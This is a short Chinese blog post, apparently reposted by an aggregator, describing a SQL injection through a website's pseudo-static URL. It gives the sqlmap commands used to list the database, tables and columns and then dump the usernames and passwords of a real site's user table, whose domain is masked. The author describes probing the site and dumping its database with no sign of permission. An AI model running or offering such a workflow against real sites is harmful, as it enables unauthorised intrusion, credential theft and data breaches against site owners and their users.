伪静态注入

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了伪静态注入相关的知识,希望对你有一定的参考价值。

今天在学习的过程中发现了一个网站的伪静态含有注入,便对此进行了渗透

技术分享

利用工具:sqlmap

我在”/id/12.html“上的12后面加上*,然后放在sqlmap上爆

先查看当前的数据库,命令为sqlmap.py -u url --current-db,查看的数据库为下图

技术分享

1:查看这个数据库里面的表,指定数据库命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en --tables

技术分享


2:找出表中含有的字段,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user --columns

技术分享


3:爆这些字段的内容:name,password,username,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user -C name,password,username --dump

技术分享


如上所示,爆出了字段的内容,获得了用户名和密码,密码是需要解密的,最后是拖库



本文出自 “costin” 博客,请务必保留此出处http://brighttime.blog.51cto.com/12837169/1918427

以上是关于伪静态注入的主要内容,如果未能解决你的问题,请参考以下文章

常见SQL注入手法

静态化 - 真静态+伪静态 - 总结

帝国CMS伪静态问题.

nginx伪静态问题

Nginx伪静态规则怎么设置

ThinkPHP怎么实现伪静态